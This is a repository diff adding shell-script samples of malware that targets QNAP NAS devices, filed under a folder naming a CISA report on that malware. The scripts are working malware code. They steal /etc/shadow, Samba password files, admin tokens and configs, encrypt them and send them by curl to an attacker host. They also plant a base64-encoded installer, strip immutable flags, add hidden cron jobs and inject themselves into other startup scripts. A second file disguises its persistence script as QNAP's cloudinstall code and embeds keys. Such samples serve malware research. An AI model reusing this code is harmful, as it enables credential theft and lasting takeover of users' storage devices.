test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
|
||||
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }
|
||||
|
||||
if [ $? -eq 0 ] || mount | grep "$mdir" >/dev/null; then
|
||||
for file in "${mdir}"/K01* "${mdir}/autorun.sh" '/tmp/config/autorun.sh'; do
|
||||
if [ -f "$file" ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +ia "$file"
|
||||
fi
|
||||
done
|
||||
fi
|
||||
umount "$mdir"
|
||||
rmdir "$mdir"
|
||||
fi
|
||||
|
||||
if [ ! -f '1553058001_c' ]; then
|
||||
touch '1553058001_c'
|
||||
key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
|
||||
{ echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
|
||||
{ echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/smbpasswd /etc/shadow /etc/config/*.conf /etc/default_config/*.conf /etc/*.conf /etc/config/.*.conf /etc/default_config/.*.conf /etc/.*.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; printf '%s:' "display_name"; /sbin/get_display_name; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
|
||||
fi
|
||||
|
||||
if [ ! -f 1551848403_c ]; then
|
||||
touch 1551848403_c
|
||||
test -f liveupdate.sh && cronscriptpath=.liveupdate/liveupdate.sh || { test -f backup_conf.sh && cronscriptpath=.config/backup_conf.sh; }
|
||||
|
||||
if [ ! -z $cronscriptpath ]; then
|
||||
test -d "${bdir}/.system" || mkdir -p "${bdir}/.system"
|
||||
echo '(exec>/dev/null>&1 2>&1;(PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin";openssl base64 -d -A <<"EOF"|sh&' > "${bdir}/.system/.qinstaller.sh"
|
||||
chmod 755 "${bdir}/.system/.qinstaller.sh"
|
||||
{
|
||||
cat <<"XXEOF"
|
||||
( exec >/dev/null 2>&1; (
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
sleep 5
|
||||
XXEOF
|
||||
cat <<XXEOF
|
||||
if [ ! -f "\${bdir}/.qpkg/${cronscriptpath}" ]; then
|
||||
set_mutable() {
|
||||
if [ ! -e "\$1" ]; then
|
||||
return 0
|
||||
fi
|
||||
if [ -e /etc/IS_64BITS ]; then
|
||||
# 64bit set mutable
|
||||
SET_M_64="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_64}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80086601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40086602, f); os.close(fd)"
|
||||
else
|
||||
# 32bit set mutable
|
||||
SET_M_32="\$1"
|
||||
python -c "import os,fcntl,sys,struct;fd = os.open('\${SET_M_32}', os.O_RDONLY); rec = struct.pack('L', 0); x = fcntl.ioctl(fd, 0x80046601, rec); flags = struct.unpack('L',x)[0]; was_immutable = flags & 0x00000010; flags = flags & ~0x00000010; f = struct.pack('i', flags); fcntl.ioctl(fd, 0x40046602, f); os.close(fd)"
|
||||
fi
|
||||
}
|
||||
test -f "\${bdir}/.qpkg/${cronscriptpath%/*}" || test -h "\${bdir}/.qpkg/${cronscriptpath%/*}" && { set_mutable "\${bdir}/.qpkg/${cronscriptpath%/*}"; rm -f "\${bdir}/.qpkg/${cronscriptpath%/*}"; }
|
||||
test -d "\${bdir}/.qpkg" || mkdir -p "\${bdir}/.qpkg" || mkdir "\${bdir}/.qpkg"
|
||||
test -d "\${bdir}/.qpkg/${cronscriptpath%/*}" || mkdir "\${bdir}/.qpkg/${cronscriptpath%/*}"
|
||||
cat > "\${bdir}/.qpkg/${cronscriptpath}" <<"XEOF"
|
||||
XXEOF
|
||||
cat "${cronscriptpath#*/}"
|
||||
cat <<XXEOF
|
||||
XEOF
|
||||
chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
touch -cr /bin/busybox "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
( ( exec >/dev/null 2>&1 </dev/null; "\${bdir}/.qpkg/${cronscriptpath}" </dev/null >/dev/null 2>/dev/null & ) & )
|
||||
fi
|
||||
|
||||
test -x "\${bdir}/.qpkg/${cronscriptpath}" || chmod 755 "\${bdir}/.qpkg/${cronscriptpath}"
|
||||
|
||||
crontabargs=\$(ps | grep 'cr[o]nd ' | sed -n 's/.*crond[^0-9A-Za-z-]*\\(.\\+\\)/\\1/p')
|
||||
trycount=10; trycount=\$(( \$trycount - 10 ))
|
||||
set x \$crontabargs; shift
|
||||
while [ \$# -gt 0 ] && [ \$trycount -lt 10 ]; do
|
||||
trycount=\$(( \$trycount + 1 ))
|
||||
getopts ':c:' OPT 2>/dev/null
|
||||
test "\$OPT" = 'c' && crontabfile="\${OPTARG}/admin" && break
|
||||
test "\$OPTIND" -gt 0 && shift "\$OPTIND" && OPTIND=1 || break
|
||||
done
|
||||
test "\$crontabfile" && test -f "\${crontabfile}" || crontabfile='/tmp/cron/crontabs/admin'
|
||||
|
||||
for crontab in "\$crontabfile" "\${confdir}/crontab"; do
|
||||
if \$fgrep "\${bdir}/.qpkg/${cronscriptpath}" "\$crontab"; then
|
||||
:
|
||||
else
|
||||
cronmins=\$(printf '%i' "\$(( \$RANDOM % 60 ))")
|
||||
cronhour=\$(printf '%i' "\$(( \$RANDOM % 24 ))")
|
||||
cronhour=\$(printf '%i,' "\$(( ( \$cronhour + 8 ) % 24 ))" "\$(( ( \$cronhour + 16 ) % 24 ))")"\$cronhour"
|
||||
echo "\$cronmins \$cronhour"' * * * '"\${bdir}/.qpkg/${cronscriptpath} >/dev/null 2>/dev/null" >> "\$crontab"
|
||||
crontab "\$crontab"
|
||||
sleep 2
|
||||
fi
|
||||
done
|
||||
) & ) &
|
||||
XXEOF
|
||||
} | { openssl base64 -A; echo; echo 'EOF'; echo ')&)'; } >> "${bdir}/.system/.qinstaller.sh"
|
||||
{ { crontab -l || cat /etc/config/crontab; } | grep -v '^ *#' | awk '{ print $6 }'; sed -n 's/^ \?[Ss]hell \?= \?//p' /etc/config/qpkg.conf; } | grep '/' | sort | uniq | while IFS= read -r line; do
|
||||
test ! -z "$line" || continue
|
||||
test -f "$line" || continue
|
||||
test "$line" = $(pwd)/liveupdate.sh || test "$line" = $(pwd)/backup_conf.sh && continue
|
||||
grep '/\.system/\.qinstaller\.sh"; exit' "$line" && continue
|
||||
head -n 1 "$line" | grep '^#! \?/bin/b\?a\?sh' || continue;
|
||||
tab=' '
|
||||
test "${#tab}" -eq 1 || tab=$(printf '\011') || tab=$(echo -e '\011')
|
||||
sed -i 's!^\([ '"$tab"']\{1,\}\)exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!\1{ '"${bdir}/.system/.qinstaller.sh"'; exit\2; }\3!;s!^exit\([ '"$tab"']\{1,\}[0-9]\{1,\}\)\{0,1\}\(\;\{0,1\}[ '"$tab"']*\)$!{ '"${bdir}/.system/.qinstaller.sh"'; exit\1; }!;s!/.qpkg/.q\{0,1\}installer.sh; exit!/.system/.qinstaller.sh; exit!' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,5p' "$line" | md5sum)
|
||||
hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
trycnt=20
|
||||
while [ "x$hash" = 'x18ec5ab42dc1231da518951e4479c27b' ] && [ "$trycnt" -gt 0 ]; do
|
||||
trycnt=$(( $trycnt - 1))
|
||||
sed -i '2,5d' "$line"
|
||||
hash=''
|
||||
hash=$(sed -n '2,568{/key=/d;s/\.liveupdate\/liveupdate\.sh//g;s/\.config\/backup_conf\.sh//g;p}' "$line" | md5sum)
|
||||
hash=${hash%${hash##*[0-9a-f]}}; hash=${hash#${hash%%[0-9a-f]*}}
|
||||
done
|
||||
done
|
||||
fi
|
||||
fi
|
||||
|
||||
test -f "${ts}_c" || touch "${ts}_c"
|
||||
rm -f "${CWD}/".tmp.*
|
||||
exit 0
|
||||
}
|
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9791c5f567838f1705bd46e880e38e21e9f3400c353c2bf55a9fa9f130f3f077
Normal file
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9791c5f567838f1705bd46e880e38e21e9f3400c353c2bf55a9fa9f130f3f077
Normal file
@ -0,0 +1,572 @@
|
||||
#!/bin/sh
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -d "$confdir" || confdir=/etc/config
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
|
||||
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
|
||||
//I;s/\(^\|\
|
||||
\)\[[^\
|
||||
]\+\]\
|
||||
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
echo 'ab*c' | grep -F 'ab*c' >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
test "$fgrep" || fgrep=grep
|
||||
|
||||
if [ ! -f "${bdir}/.qpkg/.liveupdate/liveupdate.sh" ]; then
|
||||
test -d "${bdir}/.qpkg" || mkdir -p "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
test -d "${bdir}/.qpkg/.liveupdate" || mkdir "${bdir}/.qpkg/.liveupdate"
|
||||
cat > "${bdir}/.qpkg/.liveupdate/liveupdate.sh" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
